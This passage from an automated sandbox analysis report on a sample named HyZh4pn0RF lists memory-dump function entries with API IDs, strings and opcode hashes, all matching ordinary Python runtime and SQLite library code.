                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                                                                                                  • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                                                                                                  • API String ID: 3882229318-4056717002
                                                                                                                                                                                                                                                                                                  • Opcode ID: 715c9f25760f3b51f9c773b91e4e06c178d711229799cf52a99adf42e7180ef0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 560e9659db5a48ab2788b26b86706bc95d61156866d056bfa2e69d6a7c341821
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 715c9f25760f3b51f9c773b91e4e06c178d711229799cf52a99adf42e7180ef0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B111FB5E1AA47C1EB018B28E4842B46368FB88F48F840475EE0D472A0DF7DD14BC761
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 70a5f35237a7bac29e318148100934e2ec0d39acdf239b2d5f662bd422f8af1b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2d15595e7f782591399a05a1cce1cb376c0290050df17eb6fe8b87af319ae415
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a5f35237a7bac29e318148100934e2ec0d39acdf239b2d5f662bd422f8af1b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901D3B2A8BA1291FA075BACDC542B4B271BB10B90F44E434CE2E063B1DF3EA5858341
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 61c017c81d5e6fa3815ca9fce73e5b847532078dee348fb6f530cef8c5aad8c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: d8e834f6cb07b5673c8a5738a4cf9d540169971c1a5b6fc4ca016ed81ed528be
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61c017c81d5e6fa3815ca9fce73e5b847532078dee348fb6f530cef8c5aad8c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E901E5B6A8BA5681FA175BADEC502B5A6B1AB04B91F44E035CE2D073B0DE3DE4819300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3307c57545eb4b4e003a50abc7e3a22bbca76da34ce5ed7b4551bd04aed3351c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94d414ea2201f1a63cb727a23c775e563241e21acd7a1322ea95665f9672f622
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3307c57545eb4b4e003a50abc7e3a22bbca76da34ce5ed7b4551bd04aed3351c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001E5B2B8BA5291F7175BBDEC502B9A271BB00B90F44A435CD2E073B0DF3DA4818301
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
                                                                                                                                                                                                                                                                                                  • Instruction ID: f34eb6024e0dbb750084e04905d79279b796c4da88998fdba8910a5db92396d0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01E9F6A8BA0282F6175BA8EC54278A6B1AB44B91F44A434CD2D067B1EE3DE4818741
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d2c9879c812503ac707a3936f6410e182a93534903fc4549493e7638f9e549d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A01E5A2E8BA0681F6075BA9EC50274A6B1AB04B90F44E035CD2D0B3B4DE3DE4858300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
                                                                                                                                                                                                                                                                                                  • Instruction ID: a52704de6adc3981fbd12e5d84983f3e4da468841b88828c35ff1d1b365945fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401E9B5A8BA0281FB474BA9DC503B5A6B1AF44B95F44E435CD2E077B1DF3DA4858301
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
                                                                                                                                                                                                                                                                                                  • Instruction ID: b86b3c3f87a4535646d776034566e534507b38fa1be6f27be100d6a01405c1cc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0401E9A5A8BA0281F7175FBDDC50274A6B1AB45BA5F44A039CD2D073B0DE3DA5818701
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_Vectorcall
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 1057673266-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 05282e0b4091cf9550d2e5abd95b7c32b57fd14b215a1756e5958a1d89901a35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F06DB6F8B65281EA675FA9EC103B9E271FB40BE1F40E035CE5906A60EE3C95458740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$DeallocErr_$ArgsAttrCallInstanceObjectOccurred
                                                                                                                                                                                                                                                                                                  • String ID: ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 1598006454-4234197119
                                                                                                                                                                                                                                                                                                  • Opcode ID: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
                                                                                                                                                                                                                                                                                                  • Instruction ID: 137a75b28b6245dfca3a630e2bd2a8887e7d4a1443bf5aa8a3d0490aac05e8bf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B01BBA5E8BA0681FE575BBEEC14275E3B0AF44B54F04F439CD2D062B5EE7CA1818704
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_Format
                                                                                                                                                                                                                                                                                                  • String ID: %s object expected; and errored formatting real type!$%s object expected; got %U
                                                                                                                                                                                                                                                                                                  • API String ID: 376477240-2630277986
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                                                                                                  • Instruction ID: 684fe1c05f570492ea99a79b823a853b84271491a4e7c56139d9371370ef0fef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF03CB1A1AA4281EE474BAEEDA02B8E2B0FB48BC4F44A035DE2D06675DF6DD5408700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 4228545439-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
                                                                                                                                                                                                                                                                                                  • Instruction ID: b197f6bed2e8c03a965bdea6172ca981e4148d83e21149f99d3110e8f7792364
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F0E7A1F8BA1281FA175BB9EC502B5B271BF00B91F40A034CD2D066B1EE7DA5858341
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFBAA59EBA2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 1475443563-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
                                                                                                                                                                                                                                                                                                  • Instruction ID: 459b690db561f1f905cb31a47e6c53c4f29aa998aebb82c84bbf4126b7d3fa04
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54F18CB2B05742DBEB218B76C5806AD37A9FB05B88B004075DF0DABB84DF38E816C754
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cc4712f8e957dd4317e1a856f1be935244d956fb36af113a7da43f43788141d5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 832f670e7932a286d9dc1bbc631d027e409d69247b13c4271927802950a46de2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc4712f8e957dd4317e1a856f1be935244d956fb36af113a7da43f43788141d5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC218EA261A742C3DA259B2AF5410BAB3A5FF45BC0B046171DF8E47F5ADF2CE4928610
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-2815843928
                                                                                                                                                                                                                                                                                                  • Opcode ID: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
                                                                                                                                                                                                                                                                                                  • Instruction ID: be5ca83905eb7e0df3b0a1982978b3dae021b1baea6cdb5cec3d190a4c6a6527
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DC1A0A1A0FB42C5FA568B76E85067873A8FF49B80F0411B5DD5E43690DF3CE44AE720
                                                                                                                                                                                                                                                                                                  APIs
